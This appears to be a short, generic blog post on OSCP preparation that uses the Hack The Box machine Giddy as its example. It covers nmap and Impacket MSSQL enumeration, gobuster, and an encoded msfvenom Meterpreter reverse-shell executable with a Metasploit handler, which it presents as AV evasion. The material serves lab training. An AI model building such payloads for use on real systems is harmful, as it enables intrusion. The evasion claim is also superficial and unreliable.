Mastering MSSQL Enumeration and AV Evasion for OSCP Preparation

By /

Listen to this Post

In the world of penetration testing, mastering MSSQL enumeration and AV evasion is crucial for success in exams like OSCP. The Hack The Box (HTB) machine “Giddy” is an excellent example of a challenge that tests these skills. To own the Giddy machine, you need to think outside the box, especially during the foothold phase.

Enumerating MSSQL

MSSQL enumeration is a critical skill for identifying vulnerabilities in databases. Here’s a quick guide to get started:

1. Nmap Scan for MSSQL Services

Use Nmap to identify MSSQL services running on the target:

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password <target_ip>

2. Connecting to MSSQL

Use `sqsh` or `mssqlclient.py` from Impacket to connect to the database:

sqsh -S <target_ip> -U <username> -P <password>

Or with Impacket:

mssqlclient.py <username>@<target_ip> -windows-auth

3. Enumerating Databases and Tables

Once connected, enumerate databases and tables using SQL queries:

SELECT name FROM sys.databases; 
USE <database_name>; 
SELECT * FROM information_schema.tables;

Web Enumeration

Web enumeration is another key skill. Use tools like `gobuster` or `dirsearch` to discover hidden directories and files:

gobuster dir -u http://<target_ip> -w /path/to/wordlist.txt

AV Evasion

AV evasion is often overlooked but is essential for gaining a final shell. A simple technique involves encoding payloads to bypass detection:

1. Generating an Encoded Payload

Use `msfvenom` to create an encoded payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe -e x86/shikata_ga_nai -o shell.exe

2. Setting Up a Listener

Start a Metasploit listener to catch the reverse shell:

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set LHOST <your_ip> 
set LPORT 4444 
run

What Undercode Say

Mastering MSSQL enumeration and AV evasion is essential for any aspiring penetration tester, especially those preparing for the OSCP exam. The Giddy machine on Hack The Box is a perfect example of how these skills are applied in real-world scenarios.

To further enhance your skills, practice the following commands and techniques:

  • Linux Commands for Enumeration
    netstat -tuln # Check open ports 
ps aux # List running processes

  • Windows Commands for Privilege Escalation
    [cmd]
    whoami /priv # Check user privileges
    systeminfo # Gather system information
    [/cmd]

  • Additional Resources
    For more advanced techniques, refer to the Hack The Box Academy and Offensive Security’s PEN-200 Course.

By combining these skills, you’ll be well-prepared to tackle challenges like Giddy and succeed in your OSCP journey. Keep practicing, and always think outside the box!

References:

Hackers Feeds, Undercode AIFeatured Image

Related Posts: